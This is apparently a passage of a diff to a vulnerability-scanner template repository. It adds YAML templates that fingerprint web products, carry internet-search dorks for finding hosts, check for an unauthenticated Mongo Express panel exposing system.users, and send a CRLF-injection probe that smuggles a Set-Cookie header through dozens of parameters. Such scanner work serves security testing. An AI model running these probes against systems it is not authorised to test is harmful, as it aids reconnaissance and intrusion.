          - '(?i)(syntax|parse) error'
          - '(?i)Allowed Memory Size of \d* Bytes Exhausted'
          - '(?i)Maximum execution time of \d* seconds exceeded'
--- a/misconfiguration/unauthenticated-mongo-express.yaml
+++ b/misconfiguration/unauthenticated-mongo-express.yaml
@ -1,8 +1,8 @@
-id: unauthenticated-mongo-express.yaml
+id: unauthenticated-mongo-express
 info:
  name: Mongo Express Unauthenticated
-  author: dhiyaneshDK
+  author: dhiyaneshDK,b0rn2r00t
  severity: high
  reference: https://www.exploit-db.com/ghdb/5684
  tags: mongo,unauth
@ -12,12 +12,15 @@ requests:
    path:
      - '{{BaseURL}}'
      - '{{BaseURL}}/mongo-express/'
      - '{{BaseURL}}/db/admin/system.users'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<title>Home - Mongo Express</title>'
          - '<title>system.users - Mongo Express</title>'
        condition: or
      - type: status
        status:
          - 200
--- a/technologies/abyss-web-server.yaml
+++ b/technologies/abyss-web-server.yaml
@ -0,0 +1,25 @@
 id: abyss-web-server
 info:
  name: Detect Abyss Web Server
  author: pussycat0x
  severity: info
  tags: tech
  additional-fields:
    fofa-dork: 'app="Abyss-Web-Server"'
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Welcome to Abyss Web Server"
      - type: status
        status:
          - 200
--- a/technologies/adobe-coldfusion-detector.yaml
+++ b/technologies/adobe-coldfusion-detector.yaml
@ -0,0 +1,62 @@
 id: adobe-coldfusion-detector
 info:
  name: Adobe ColdFusion Detector
  author: philippedelteil
  severity: info
  description: With this template we can detect the version number of Coldfusion instances based on their logos.
  tags: adobe,coldfusion
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
      - "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
      - "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
      - "{{BaseURL}}/cfide/administrator/images/background.jpg"
      - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
      - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
    redirects: true
    stop-at-first-match: true
    max-redirects: 2
    matchers:
      - type: dsl
        name: "coldfusion-8"
        dsl:
          - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
      - type: dsl
        name: "coldfusion-9"
        dsl:
          - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
      - type: dsl
        name: "coldfusion-10"
        dsl:
          - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
      - type: dsl
        name: "coldfusion-11"
        dsl:
          - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
      - type: dsl
        name: "coldfusion-2016"
        dsl:
          - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
      - type: dsl
        name: "coldfusion-2021"
        dsl:
          - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
      - type: dsl
        name: "coldfusion-2018"
        dsl:
          - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
      - type: dsl
        name: "coldfusion-mx-7"
        dsl:
          - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
--- a/technologies/apache-axis-detect.yaml
+++ b/technologies/apache-axis-detect.yaml
@ -14,6 +14,7 @@ requests:
      - "{{BaseURL}}/axis2/"
      - "{{BaseURL}}/axis/"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/technologies/craft-cms-detect.yaml
+++ b/technologies/craft-cms-detect.yaml
@ -0,0 +1,28 @@
 id: craft-cms-detect
 info:
  name: Craft CMS Detect
  author: skeltavik
  severity: info
  description: Detects Craft CMS
  reference: https://craftcms.com
  tags: tech,craftcms
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: header
        words:
          - 'X-Powered-By: Craft CMS'
      - type: regex
        part: header
        regex:
          - 'Set-Cookie: (Craft|CRAFT)'
--- a/technologies/graphql-detect.yaml
+++ b/technologies/graphql-detect.yaml
@ -52,6 +52,7 @@ requests:
    body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/technologies/kubernetes-enterprise-manager.yaml
+++ b/technologies/kubernetes-enterprise-manager.yaml
@ -0,0 +1,25 @@
 id: kubernetes-enterprise-manager
 info:
  name: Detect Kubernetes Enterprise Manager
  author: pussycat0x
  severity: info
  tags: tech,kubernetes
  additional-fields:
    fofa-dork: 'app="Kubernetes-Enterprise-Manager"'
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Kubernetes Enterprise Manager"
      - type: status
        status:
          - 200
--- a/technologies/kubernetes-mirantis.yaml
+++ b/technologies/kubernetes-mirantis.yaml
@ -0,0 +1,25 @@
 id: kubernetes-mirantis
 info:
  name: Detect Mirantis Kubernetes Engine
  author: pussycat0x
  severity: info
  tags: tech,kubernetes
  additional-fields:
    fofa-dork: 'app="Mirantis-Kubernetes-Engine"'
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Mirantis Kubernetes Engine"
      - type: status
        status:
          - 200
--- a/technologies/lotus-domino-version.yaml
+++ b/technologies/lotus-domino-version.yaml
@ -14,6 +14,7 @@ requests:
      - "{{BaseURL}}/iNotes/Forms85.nsf"
      - "{{BaseURL}}/iNotes/Forms9.nsf"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/technologies/openam-detection.yaml
+++ b/technologies/openam-detection.yaml
@ -29,6 +29,7 @@ requests:
      - "{{BaseURL}}/openam/json/serverinfo/*"
    redirects: true
    stop-at-first-match: true
    max-redirects: 2
    matchers-condition: and
    matchers:
--- a/technologies/oracle-iplanet-web-server.yaml
+++ b/technologies/oracle-iplanet-web-server.yaml
@ -0,0 +1,25 @@
 id: oracle-iplanet-web-server
 info:
  name: Detect Oracle-iPlanet-Web-Server
  author: pussycat0x
  severity: info
  tags: tech,oracle
  additional-fields:
    fofa-dork: 'app="Oracle-iPlanet-Web-Server'
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Oracle iPlanet Web Server"
      - type: status
        status:
          - 200
--- a/technologies/telerik-dialoghandler-detect.yaml
+++ b/technologies/telerik-dialoghandler-detect.yaml
@ -29,6 +29,7 @@ requests:
      - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
      - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/vulnerabilities/generic/crlf-injection.yaml
+++ b/vulnerabilities/generic/crlf-injection.yaml
@ -20,6 +20,7 @@ requests:
      - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
      - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
--- a/Show More
+++ b/Show More